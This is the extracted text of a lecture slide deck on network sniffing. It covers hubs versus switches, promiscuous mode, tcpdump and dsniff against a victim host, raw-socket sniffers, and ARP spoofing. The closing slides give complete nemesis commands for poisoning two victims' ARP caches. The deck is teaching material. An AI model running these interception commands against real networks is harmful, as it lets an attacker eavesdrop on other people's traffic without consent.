Download presentation
1
0x440 Network Sniffing
2
Network Sniffing Sniffing Tools ARP Spoofing
3
What is the Network Sniffing
The act of capturing packets that aren’t necessarily meant for public viewing is called SNIFFING
4
Two Sniffing Flows According to Network
Non-switched network environment Setting the promiscuous mode Packet-capturing Switched network environment ARP spoofing
5
Non-switched vs. Switched Network
The flow of traffic in a non-switched network (cont.) It should be noted that step 3 and 4 can be reversed in order
6
Non-switched vs. Switched Network
The flow of traffic in a non-switched network Step 1 Node A transmits a frame to Node C Step 2 Hub will broadcast this frame to active port Setp 3 Node B will receive the frame and will examine the address in the frame. After determining that it is not the intended host, it will discard the frame Step 4 Node C will receive the frame and will examine the address in the frame. After determining that it is the intended host. it will process the frame further
7
Non-switched vs. Switched Network
How to generate Canary Non-switched vs. Switched Network The flow of traffic in a switched network (cont.)
8
Non-switched vs. Switched Network
The flow of traffic in a switched network Step 1 Node A transmits a frame to Node C Step 2 The switch will examine this frame and determi ne what the intended host is. It will then set up a connection between Node A and Node C so that they have a ‘private’ connection Setp 3 Node C will receive the frame and will examine the address. After determining that it is the intended host, it will process the frame further
9
Sniffing Non-switched Network
For a host to be used as a sniffing agent, NIC must be set to the promiscuous mode After the promiscuous mode is set... NIC no longer drop network frames which are addressed to other hosts
10
Sniffing Non-switched Network
Setting the promiscuous mode $ sudo ifconfig eth0 promisc
11
Packet Capturing Tools
Sniffers tcpdump dsniff Raw socket sniffer raw_tcpsniff pcap_sniff (with libpcap) decode_sniff (with libpcap)
12
Sniffer: tcpdump $ sudo tcpdump –X ‘ip host <victim IP>’
13
Sniffer: dsniff $ sudo dsniff –n
14
Packet Capturing Tools
Sniffers tcpdump dsniff Raw socket sniffer raw_tcpsniff pcap_sniff (with libpcap) decode_sniff (with libpcap)
15
# Raw Socket Raw socket is an network socket that allows direct sending and receiving of Internet protocol packets without any protocol-specific transport layer formatting Raw socket is specified by suing SOCK_RAW as the type There are multiple protocol options IPPROTO_TCP, IPPROTO_UDP, IPROTO_ICMP
16
Raw Socket Sniffer: raw_tcpsniff
raw_tcpsniff.c
17
Raw Socket Sniffer: raw_tcpsniff
$ gcc –o raw_tcpsniff raw_tcpsniff.c $ sudo ./raw_tcpsniff
18
Raw Socket Sniffer with Libpcap: pcap_sniff
pcap_sniff.c
19
Raw Socket Sniffer with Libpcap: pcap_sniff
$ gcc –o pcap_sniff pcap_sniff.c –lpcap $ sudo ./pcap_sniff
20
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
21
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
22
Raw Socket Sniffer with Libpcap: Decode_sniff
decode_sniff.c
23
Raw Socket Sniffer with Libpcap: decode_sniff
$ gcc –o decode_sniff decode_sniff.c –lpcap $ sudo ./decode_sniff
24
Sniffing Switched Networks
ARP spoofing One of the basic operations of the Ethernet protocol revolves around ARP (Address Resolution Protocol) requests and replies. In general, when Node A wants to communicate with Node C on the network, it sends an ARP request. Node C will send an ARP reply which will include the MAC address. Even in a switched environment, this initial ARP request is sent in a broadcast manner. It is possible for Node B to craft and send an unsolicited, fake ARP reply to Node A. This fake ARP reply will specify that Node B has the MAC address of Node C. Node A will unwittingly send the traffic to Node B since it professes to have the intended MAC address.
25
Sniffing Switched Network
ARP spoofing using NEMESIS (cont.) Attacker IP: MAC: 00:00:00:BB:BB:BB Victim1 IP: MAC: 00:00:00:AA:AA:AA Victim2 IP: MAC: 00:00:00:CC:CC:CC
26
Sniffing Switched Network
ARP spoofing using NEMESIS (cont.) Attacker (System B) → Victim1 (System A) $ sudo nemesis arp –v –r –d eth0 –S –D -h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA -H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA Attacker (System B) → Victim2 (System C) $ sudo nemesis arp –v –r –d eth0 –S –D -h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC -H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC
27
Sniffing Switched Network
ARP spoofing using NEMESIS ARP Cache of Victim1 (System A) ARP Cache of Victim2 (System C)
28
the end
Similar presentations
© 2024 SlidePlayer.com. Inc.
All rights reserved.